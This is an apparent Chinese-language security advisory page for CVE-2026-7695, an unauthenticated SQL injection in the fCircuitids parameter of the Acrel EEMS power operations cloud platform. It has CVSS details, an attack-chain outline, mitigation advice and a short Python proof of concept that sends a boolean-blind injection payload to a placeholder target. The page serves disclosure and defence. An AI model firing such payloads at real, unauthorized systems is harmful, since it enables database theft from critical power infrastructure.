CVE-2026-7695 CVSS 7.3 高危

CVE-2026-7695: Acrel EEMS SQL注入漏洞

披露日期: 2026-05-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7695

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform

漏洞概述

Acrel Electrical EEMS企业电力运维云平台1.3.0版本存在高危漏洞。该漏洞位于/SubstationWEBV2/main/elecMaxMinAvgValue文件的未知功能中，由于未正确过滤fCircuitids参数，导致SQL注入。攻击者无需认证且无需用户交互，即可通过网络发起远程攻击。目前漏洞利用细节已公开，厂商尚未回应，建议尽快修复。

技术细节

该漏洞属于典型的SQL注入漏洞。漏洞根源在于Acrel EEMS平台在处理/SubstationWEBV2/main/elecMaxMinAvgValue接口请求时，未能正确过滤用户提交的fCircuitids参数。攻击者可以构造恶意的SQL语句作为该参数的值发送给服务器。由于后端直接将参数拼接到SQL查询中执行，导致攻击者能够操控数据库查询逻辑。具体利用时，攻击者可以通过发送包含UNION SELECT、布尔盲注或时间盲注等Payload的HTTP请求，从数据库中提取敏感信息（如用户凭证、系统配置等），甚至可能获取服务器读写权限。鉴于系统无需认证即可访问该接口，这使得攻击门槛极低，严重威胁企业电力运维数据的安全性与完整性。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出运行Acrel EEMS平台的目标系统，并定位到/SubstationWEBV2/main/elecMaxMinAvgValue接口。

STEP 2

2. 漏洞利用

攻击者向该接口发送特制的HTTP GET或POST请求，在fCircuitids参数中注入恶意SQL代码（如UNION SELECT语句）。

STEP 3

3. 数据窃取

后端数据库执行恶意SQL语句，将查询结果返回给攻击者，导致敏感数据泄露或数据库被进一步控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://target-ip/SubstationWEBV2/main/elecMaxMinAvgValue"

# Malicious payload to test SQL Injection
# Attempting to perform a boolean-based blind injection
payload = "1' AND 1=1-- -"

parameters = {
    "fCircuitids": payload
}

try:
    # Send GET request with the payload
    response = requests.get(target_url, params=parameters, timeout=10)
    
    # Check if the request was successful
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
        
        # Analyze response to confirm vulnerability (logic depends on application behavior)
        if "expected_data" in response.text:
            print("[!] Potential SQL Injection vulnerability confirmed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0

防御指南

临时缓解措施

在厂商发布修复补丁之前，建议通过访问控制列表（ACL）限制对/SubstationWEBV2/main/elecMaxMinAvgValue接口的外部访问，或直接关闭该功能模块（如果业务允许）。同时，应在系统边界部署Web应用防火墙（WAF），针对SQL注入特征进行拦截。管理员应密切监控数据库日志，排查是否存在异常的查询记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7695
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7695
3 Details https://www.cvedetails.com/cve/CVE-2026-7695/
4 VulDB https://vuldb.com/cve/CVE-2026-7695
5 Link https://ucn9h68n9289.feishu.cn/wiki/QoXfwTAOiiYw2OkO0vAc7b7SnGg
6 Link https://vuldb.com/submit/803275
7 Link https://vuldb.com/vuln/360864
8 Link https://vuldb.com/vuln/360864/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表